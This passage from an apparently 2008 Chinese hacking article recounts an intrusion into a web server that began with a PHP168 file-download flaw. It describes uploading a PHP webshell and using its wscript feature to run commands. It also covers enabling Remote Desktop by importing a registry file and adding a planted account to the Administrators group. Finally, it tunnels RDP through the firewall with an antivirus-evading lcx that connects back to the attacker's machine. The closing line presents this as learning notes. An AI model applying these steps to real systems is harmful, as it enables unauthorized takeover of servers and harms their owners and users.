由PHP168任意文件下载0DAY到服务器提权
2008-12-15 13:38:26 来源:WEB开发网10.直接上传PHP大马
不过一直在我身后支持我的哥们儿——“孤水绕城”提醒我换一个大马试一试,并顺手把他经常用的angle写的PHP木马给了我,把新的木马传上去以后,系统命令依然无法执行,反弹Shell也不成功,不过我发现这个木马在执行系统命令时多了一个选项。如图12所示。
PHP168任意文件下载0DAY到服务器提权" border="0" onload="return imgzoom(this,550);" style="cursor:pointer;" onclick="javascript:window.open(this.src);"/>
图12新木马中的好东东
在这里我选择用wscript试一下,执行命令net user,竟然成功了。如图13所示。
PHP168任意文件下载0DAY到服务器提权" border="0" onload="return imgzoom(this,550);" style="cursor:pointer;" onclick="javascript:window.open(this.src);"/>
图13使用新功能添加用户成功
11.查看系统开放端口和打开3389远程终端
没想到这个英文的木马这么好用,而且我还发现系统里竟然有一个heart用户,应该是我刚才用Serv-U加进去的,只是没有返回罢了。我又看了一下系统开放的端口,端口开的挺多只是没有3389。如图14所示。
PHP168任意文件下载0DAY到服务器提权" border="0" onload="return imgzoom(this,550);" style="cursor:pointer;" onclick="javascript:window.open(this.src);"/>
图14查看网络端口开放情况
我传了几个开3389的程序上去,结果都难逃被杀的命运。最后我找到一个同样功能的注册表文件3389.reg,上传到服务器C:WINDOWSTemp目录(这个目录IUSER权限的用户可读写),用PHP的wscript后执行“reg import C:WINDOWSTemp3389.reg”试了下,3389成功开放如图15所示。
PHP168任意文件下载0DAY到服务器提权" border="0" onload="return imgzoom(this,550);" style="cursor:pointer;" onclick="javascript:window.open(this.src);"/>
图15开放3389端口
难道现在大马已经是系统权限的了,赶紧用IISPutScanner扫了下该网站。原来是Apache搭建的PHP环境,大家都知道Windows 2003+Apache+PHP如果以“LocalSystem”启动的话默认的PHP就具有最高权限。这下不用Serv-U来执行命令了。
执行“net localgroup admininstrators heart /add”命令把heart用户添加到Administrators组里面,进行远程桌面连接。
12.使用端口转发程序成功进入该服务器
本来以为本次入侵已经告一段落了,可是在我等了很长时间以后,竟然提示连接失败。根据以往的入侵经验,八成是被防火墙拦下了。看来只能进行端口转发了,找一个免杀的lcx传上去,本地执行“lcx –listen 110 1987”命令,服务器上执行“lcx –slave 本地ip 110 服务器ip 3389命令”然后用远程桌面连接本机的1987端口,顺利的进入远程桌面。如图16所示。
PHP168任意文件下载0DAY到服务器提权" border="0" onload="return imgzoom(this,550);" style="cursor:pointer;" onclick="javascript:window.open(this.src);"/>
图16.成功连入服务器
最后总结下,本文只是作为一个菜鸟的学习心得,希望大家能够多关注网络安全,多关注antian365——这个默默无闻为网络安全洒下辛劳与汗水的团队。
更多精彩
赞助商链接